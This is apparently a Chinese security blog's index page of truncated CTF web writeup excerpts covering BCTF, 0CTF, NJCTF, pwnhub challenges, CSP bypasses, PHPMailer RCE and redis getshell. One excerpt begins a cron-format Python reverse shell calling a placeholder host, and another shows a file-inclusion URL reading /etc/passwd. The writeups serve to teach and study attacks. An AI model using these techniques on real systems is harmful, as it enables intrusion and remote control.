LoRexxar's Blog

LoRexxar's Blog

热爱电子竞技的Web弱渣/Vidar-team/知道创宇404Team

bctf2017 web部分wp

周末干了一发bctf,因为周六出去玩了,所以没能看完所有的web题还是挺可惜的,先整理已经做了的2道火日聚聚的web题,后面在整理别的题目。 paint 打开题目是一个画画板,除了基本的画画功能以外,还可以上传图片文件。浅逛一下整个站不难发现有效的目标点只有2个,image.php和upload.php。 首先分析upload.php,可以上传任意文件,但要求上传文件后缀必须为图片,感觉应该是白名单,上传之后文件会改名,最重要的一点,上传图片的目录服务端做了设置,php后缀的文件会直接返回403,这也说明了后面的漏洞类型。 查看右键源码获得提示,flag在flag.php。 然后是i...

pwnhub 之小m的复仇

做题的时候思路差不多是对的,但是没想明白,讲道理是菜了,稍微整理下,这是一个比较特别的利用方式。 纵观整个站,看着很大但是有用的功能并不多,看上去唯一的输入点是注册的第三个参数,但是没意义,会经过实体编码。所以我感觉关键在于怎么找到xss点。 1、首先,classes.php这里有专门的路由,而且这个页面里有个单独存在的css,http://52.80.19.55/classes.php/,这里肯定是故意的。 2、css的引入方式是相对路径,<link rel="stylesheet" type="text/css" href="...

0ctf201 web部分writeup

纪念下偷偷登上萌新榜第一的比赛,也实现了比赛前的愿望,0ctf争取不0分,rsctf争取高名次,:> Temmo’s Tiny Shop题目是个类似于小卖铺的站,最有趣的是刚开始的时候,这题进去是钱很多的,可以随便买,也可以看到hint1OK! Now I will give some hint: you can get flag by use `select flag from b7d8769d64997e392747dbad9cd450c4` 后来突然题目就改了,只有4000块了,买不了hint,很气…(看别人的wp听说admin是弱口令还是什么的,里面一百多万可以随便买…...

NJCTF Web部分writeup

又到了一年一度的比赛季,这次打了打赛宁自己办的NJCTF,这里稍微整理下Web部分的wp,虽然不知道题目是谁出的,但是我觉得大部分题目还是挺蠢的…看的人从中汲取自己想要的知识就好。 WebLogin1login? 没啥好玩的,注册的时候有超长用户名截断 原理就是用户名在check的时候是不同的,但是数据库字段保存是有长度的,所以会发生截断,注册中间为空格的超长用户名就可以截断为admin Get Flag123别BB,来拿FLAGPS:delay 5s 命令执行,没什么好说的。 cat 后用 & ls 列目录下文件flag在../../../9iZM2qTEmq67SOd...

pwnhub_another php web部分

周末不是太有时间,所以就没怎么打pwnhub,后来快结束的时候完成了web部分,这里贴上web部分的wp吧 开始没啥可说的,应该是用来当一些咸鱼的吧,index.php~ 登陆框,验证码很普通的,没啥可说的,试了试没啥可玩的,那就扫目录,找到了.svn 123http://52.80.32.116/2d9bc625acb1ba5d0db6f8d0c8b9d206/.svn/400 跑脚本拖源码报错了,搜了搜好像是拖的数据库报错了,所以手动看看,好像是内容被改过了 12345678http://52.80.32.116/2d9bc625acb1ba5d0db6f8d0c8b9d206/...

pwnhub 打开电脑

这是个比较特别的题目,开始上来逛了逛发现其实挺迷的… 123456题目介绍http://52.80.1.108:66662017.02.18 20:00:00没有SQL注入,仔细看CSP头。2017.02.18 12:00:00管理员只爱看有意思的东西,谁关心bug啊哈哈哈哈。 看看站内的功能,min.php和max.php可以提交md5,会显示最大或者最小的md5,但是输入的地方存在正则,研究了一下发现不能输入任何符号,也就意味着这里不存在问题。 有个contact和report bug,content提交有趣的md5,但不同的是,没有正则提示,很多都提示提交成功,report bu...

有趣的cdn bypass CSP

最近在逛github的时候看到一个bypass csp的挑战,也是我最近才知道的一个新思路,一般人bypass csp都是通过允许域下的某个漏洞构造文件绕过,但是其实往往没人注意到cdn的问题。 先贴上原文https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22 这个利用方式其实我在ctf里也遇到过https://blog.0daylabs.com/2016/09/09/bypassing-csp/ 我们写个简单的demo 12345678910111213...

聊聊hctf2016

hctf2016在11月底落幕了,零零散散已经过去了2个月了,时至今日,才算是有空收拾下一下去年的得失… 过年了总想写点儿什么,下面的东西就随便说说,祝大家新年大吉x. 聊点儿有的没得相信很多人都知道当年十一期间闹得沸沸扬扬的L-CTF和XDCTF的事,很多事情的发生让人措手不及,所以西电的大佬们选择了这样的方式来解决问题,而同样的事情其实当时正在发生在杭电HDUISA的身上…但就如当年在知乎上发的一样,为了能让杭电的CTF走的更远,我们选择了今天这条路。 早在16年的5、6月份时候,杭电成立了浙江第二个网络空间安全学院,但没想到的是,在整个信息安全专业被剥离到网安学院的同时,信息安全协...

pwnhub 深入敌后

从第一天晚上开始零零散散到17号晚,差不多做了几十个小时…由于实在没日过windows服务器,整个过程遇到各种没玩过的东西…稍微整理下writeup 为了能让看的人理解,下面的wp我保留了大部分思考过程 getshell123456789101112详情http://54.223.229.139/ 禁止转发入口ip机器的rdp服务端口,禁止修改任何服务器密码,禁止修改删除服务器文件。 禁止对内网进行拓扑发现扫描,必要信息全部可以在服务器中获得。 文明比赛,和谐共处。更新2017.01.15 11:50:00administrator:啊,好烦啊,需要设置那么多密码,偷懒好了,妈蛋,w...

phpmailer RCE漏洞分析

最近爆出来个CVE-2016-1003,国内人分析了两天发现ying 是国外十几年前发现的漏洞,分析了两天发现影响覆盖越来越严重,现在最新的patch也被绕过了,又爆了新的cve… 朋友的博客 CVE-2016-1003最早爆出来的版本是这样的 http://seclists.org/oss-sec/2016/q4/750 漏洞详情https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html 环境,poc,exp相关https://github.com/op...

浅谈xss的后台守护问题

在出好HCTF2016的两道xss题目后,就有了一个比较严重的问题就是,如何守护xss的后台,用不能人工一直在后台刷新吧(逃 一般来说,之所以python的普通爬虫不能爬取大多数的网站的原因,是因为大多数网站都把显示数据的方式改成了js执行,通过各种各样的方式,然后输出到页面中,浏览器一般帮助你完成这部分js的解析,所以我们使用的时候,就感受不到阻碍了。 但是对于普通的爬虫来说,这就是比较致命的了,那么对于python的爬虫来说,我们一般使用比较轻量级的selenium+phantomjs来解决,但是如果你的xss题目对浏览器内核有需求呢? 就好像我这里的题目guestbook浏览器要...

pwnhub_拍卖行

算是第一次做pwn题,不过有点不得不说,整个题目几乎都是web思路,除了分析bin的部分需要一点儿别的知识,其余都可以web直接做,下面稍微说下吧 由于各种各样的原因吧,最后还是被取消了成绩,不想解释太多,下面的wp已经把之前没有写过的部分全部修改增加上了,整个思路除了使用别人的poc修改,全部都是自己的思路,从一个web选手的角度去思考而已… 总览整个网站,存在任意文件包含漏洞,但是整个站都是假的,没有任何功能。 http://54.223.241.254/?page=/etc/passwd 这里可以读任意文件1234567891011121314151617181920212223...

pwnhub_找朋友

先膜tomato师傅出的题,偷马桶师傅出的题一直都是渗透思路,这点我是服的,顺手膜小m…因为在找真是ip这一步我花了十几个小时都失败了,当时的思路还留在博客里,算是个纪念吧… 首先下载下来判断文件类型是一个win程序,猜测是类似于木马样式,于是虚拟机打开抓包,发现了请求向http://shell.pwnme.site,但是无论通过whois反查还是别的,都没有收获,那么唯一的思路是扫子域名。 于是扫一波域名找到了http://blog.pwnme.site,一个python的站,有一些信息:1、存在登陆注册,user_login和user_register,登陆后从源码里看到了file...

pwnhub_WTF_writeup

周五晚上本来是看剧看到累,然后打会儿游戏的日子,一切的祸因都是大黑客告诉我pwnhub开始了Orz… 然而本以为思路是一帆风顺的,结果成功xss自己后,搞不定admin的问题,绝望到寝室断电…然而离flag只有一个转身的距离… 先看看题目信息123456题目介绍http://54.223.108.205:23333 --------- 12.10 00.00 admin只是一个用户名 没有特权 进去后测试下整个题目逻辑,发现了几点 1、登陆注册都有验证码 2、新建article传入title和content,会有可以看的页面 3、views.php通过传入id的base64判断,id递...

using polyglot JPEGs bypass CSP 分析

前段时间,外国爆出来的新的bypass CSP方式,这里稍微研究下。 http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html 但实际检查整个逻辑之后,我觉得应该算作是对上传检查的绕过,不能算作是bypass csp 文章里提到通过创建一个多语言的JavaScript/JPEG 来绕过CSP,他给了两张demo图片,回顾整个逻辑。 我们打开给出的demo图片和随便一张jpg图片,首先前四位是JPEG头0xFF 0xD8 0xFF 0xE0,如果你曾尝试过把一张图片当作script来执行的话,应...

通过redis getshell的一些小问题

之前在出AT Field的时候,在通过redis弹shell的过程中遇到一些问题,今天专门测试一下,解决一些疑惑 这里我们不考虑如何写入redis中,只考虑从redis到服务器这个过程 使用两种反弹shell的方式,第一种是python弹的 1* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx",6666));os.dup2(s.fileno(),0); os.dup2(s.file...

hctf2016 简单部分WEB && misc writeup

因为队伍里没有专门的misc选手,所以其实这次比赛的的misc都是我们凑的,除了最开始的杂项签到,只有你所知道的隐写就仅此而已嘛不是我出的,这里稍微整理一下,整体misc都非常简单,唯一一个比较难的misc题目还因为我的出题失误导致基本上只有一个师傅做题方式接近我的正解,下面稍微研究一下简单的web部分和misc题目 level12099年的flag题目描述:only ios99 can get flag(Maybe you can easily get the flag in 2099最终分数:10pt完成人数:226 进去后发现这么一句话,相信有经验的人第一时间就能反应过来是要改u...
LoRexxar
带着对技术的敬畏之心成长,不安于一隅...